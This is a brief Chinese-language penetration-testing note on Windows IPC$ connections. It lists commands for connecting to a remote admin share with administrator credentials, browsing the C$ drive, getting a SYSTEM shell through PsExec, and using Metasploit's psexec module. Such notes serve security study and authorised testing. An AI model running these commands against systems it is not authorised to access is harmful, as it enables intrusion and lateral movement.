企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持知识库和私有化部署方案 广告
[TOC] ## IPC * IPC(Internet Process Connection)指进程间通信开放的命名管道 * IPC可以通过验证用户名和密码获得相应权限,比如远程管理计算机和查看共享资源 * 通过ipc$,可以与目标机器建立连接,利用这个连接,可以访问目标机器的文件、上传、下载以及运行命令等 ## 利用方法 ~~~ 建立隧道 • 建立ipc$: net use \\192.168.11.12\ipc$ /user:administrator admin@123 • 查看建立的连接:net use • 访问远程文件:dir \\192.168.11.12\c$ 拿到shell 使用PsTools中的PsExec.exe PsExec.exe \\192.168.11.11 -s cmd.exe Metesploit中的psexec模块 选择模块:use exploit/windows/smb/psexec ~~~